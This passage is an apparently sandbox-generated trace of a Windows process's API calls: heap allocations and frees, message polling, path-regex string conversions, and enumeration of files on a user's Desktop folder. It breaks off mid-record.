HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2b0 | out: hHeap=0x970000) returned 1 [0125.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.374] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2b0 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b90 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a70 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539f8 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b30 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c08 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a88 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539c8 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2f0 [0125.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0125.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ed00 [0125.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0125.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9) returned 0x2e53c50 [0125.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2e53c50, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0125.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e58910 [0125.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53aa0 [0125.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0125.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0125.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop", cchWideChar=24, lpMultiByteStr=0x2e699e8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Desktop", lpUsedDefaultChar=0x0) returned 24 [0125.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0125.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0125.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ecd0 [0125.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ab8 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ebd0 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b48 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ec20 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b00 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ec00 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0125.376] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e54490, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0125.376] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e54490, cbMultiByte=24, lpWideCharStr=0x2e7e980, cchWideChar=24 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Desktop") returned 24 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b78 [0125.376] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2b0 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c08 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ba8 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec80 [0125.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a70 [0125.376] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0125.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a70 | out: hHeap=0x970000) returned 1 [0125.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ba8 | out: hHeap=0x970000) returned 1 [0125.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c08 | out: hHeap=0x970000) returned 1 [0125.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2b0 | out: hHeap=0x970000) returned 1 [0125.377] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2b0 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c68 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b00 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c50 [0125.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539c8 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b30 [0125.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539e0 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2f0 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539f8 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7eca0 [0125.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a70 [0125.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ec50 [0125.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0125.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17) returned 0x2e69a48 [0125.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x2e69a48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539f8 | out: hHeap=0x970000) returned 1 [0125.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0125.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x59) returned 0x978270 [0125.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53c20 [0125.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0125.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ebc0 [0125.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2e7ebc0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ebc0 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a70 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec50 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eca0 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539e0 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c50 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b00 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b30 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539c8 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c68 | out: hHeap=0x970000) returned 1 [0125.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2b0 | out: hHeap=0x970000) returned 1 [0125.378] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2b0 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec40 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec10 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eb80 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0125.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eb80 | out: hHeap=0x970000) returned 1 [0125.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0125.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec10 | out: hHeap=0x970000) returned 1 [0125.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec40 | out: hHeap=0x970000) returned 1 [0125.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0125.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2b0 | out: hHeap=0x970000) returned 1 [0125.379] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a70 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b90 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2b0 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b00 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec40 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a88 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ece0 [0125.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0125.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a88 | out: hHeap=0x970000) returned 1 [0125.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0125.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec40 | out: hHeap=0x970000) returned 1 [0125.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2b0 | out: hHeap=0x970000) returned 1 [0125.380] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe8e40f61, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xe8e40f61, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0xa6e800 [0125.380] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe8e40f61, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xe8e40f61, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0125.380] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3d862f0, ftCreationTime.dwHighDateTime=0x1d5ec49, ftLastAccessTime.dwLowDateTime=0xc71b7f30, ftLastAccessTime.dwHighDateTime=0x1d5ee75, ftLastWriteTime.dwLowDateTime=0xc71b7f30, ftLastWriteTime.dwHighDateTime=0x1d5ee75, nFileSizeHigh=0x0, nFileSizeLow=0xf8fc, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="-2dSSUPd3c99IL5ta.jpg", cAlternateFileName="-2DSSU~1.JPG")) returned 1 [0125.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0125.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bd8 [0125.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2b0 [0125.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2c) returned 0x2e7e6a8 [0125.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0125.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ece0 | out: hHeap=0x970000) returned 1 [0125.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b00 | out: hHeap=0x970000) returned 1 [0125.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b90 | out: hHeap=0x970000) returned 1 [0125.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a70 | out: hHeap=0x970000) returned 1 [0125.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0125.381] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.381] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0125.381] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0125.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f160 [0125.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e6a8 | out: hHeap=0x970000) returned 1 [0125.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a10 | out: hHeap=0x970000) returned 1 [0125.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a28 | out: hHeap=0x970000) returned 1 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b90 [0125.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0125.382] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.382] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eb50 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0125.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eb50 | out: hHeap=0x970000) returned 1 [0125.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0125.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.382] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ece0 [0125.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0125.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0125.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x978270 [0125.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e6a8 | out: hHeap=0x970000) returned 1 [0125.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ece0 | out: hHeap=0x970000) returned 1 [0125.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.383] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed00 [0125.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ed00 | out: hHeap=0x970000) returned 1 [0125.383] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ebb0 [0125.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ebc0 [0125.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ebc0 | out: hHeap=0x970000) returned 1 [0125.383] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1621d280, ftCreationTime.dwHighDateTime=0x1d5eb3f, ftLastAccessTime.dwLowDateTime=0x64b42e20, ftLastAccessTime.dwHighDateTime=0x1d5ecc5, ftLastWriteTime.dwLowDateTime=0x64b42e20, ftLastWriteTime.dwHighDateTime=0x1d5ecc5, nFileSizeHigh=0x0, nFileSizeLow=0xa916, dwReserved0=0x0, dwReserved1=0x0, cFileName="-U62pFYLePGc.wav", 